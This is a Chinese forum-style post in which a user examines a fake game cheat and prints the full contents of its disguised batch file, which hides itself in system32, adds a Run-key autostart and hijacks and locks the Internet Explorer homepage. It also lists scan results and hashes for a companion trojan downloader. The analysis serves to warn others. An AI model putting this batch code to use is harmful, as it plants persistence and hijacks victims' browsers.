解压缩。打开后发现一个文件为
注册软件 - 重要.bat
然后右键点编辑。
@echo off
copy %0 %windir%\system32\home.bat /y
attrib %windir%\system32\home.bat +s +h +a +r
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v home /t REG_SZ /d %windir%\system32\home.bat /f
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.computernic.cn/" /f
@reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\control Panel" /v "HomePage" /d "1" /f
发现运行上面的代码。。。
我就迷茫了。。
他干什么要把哪个地址设置为主页???
还有就是把那些东西写入 home.bat
从下面这句命令可以看出来。
attrib %windir%\system32\home.bat +s +h +a +r
把这个文件放到系统目录干什么?还要加上
+s设置为系统文件夹属性
+h隐藏属性
+a存档文件夹属性
+r只读属性
一个自己文件把自己搞的地址设置为主页不说。。还要设置为系统属性?并且隐藏?还只读?
他这个挂究竟是想干什么???。这不是挂。。
再看 Gamue_登录器
这个文件更可疑了。。
杀毒软件查不出来。。不代表这个文件没问题。因为只有31KB。。。
我很怀疑。。这是下载器一类的病毒。当时运行没什么。。可是在后台自动下载程序并且运行。
所以应该当时查不出问题。。
愚弄人的么?
我把这个文件送到网页上检测。。什么地址请搜索我的帖子。。
结果。。有两款杀毒软件查出问题了。。
看下面的结果。。
文件信息
文件名称 : Gamue_登录器.exe
文件大小 : 31744 byte
文件类型 : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : 0d9d36c85a9f04e56723cc9d4762590b
SHA1 : e6cb9efb377aae355a170fcc367470a7d9e2a67f
扫描结果
时间 : 2008/12/12 01:24:16 (CST)
软件名称 扫描结果 时间
a-squared Trojan-Downloader.Win32.Agent.ccg!A2 4.452
ClamAV Trojan.Downloader-19191 0.011
到了这里。。。我看明白了。。
这是一种在windows系统下的特洛伊木马病毒,一般是PE病毒。
删除。。。心里问候一下发这个东西的家伙。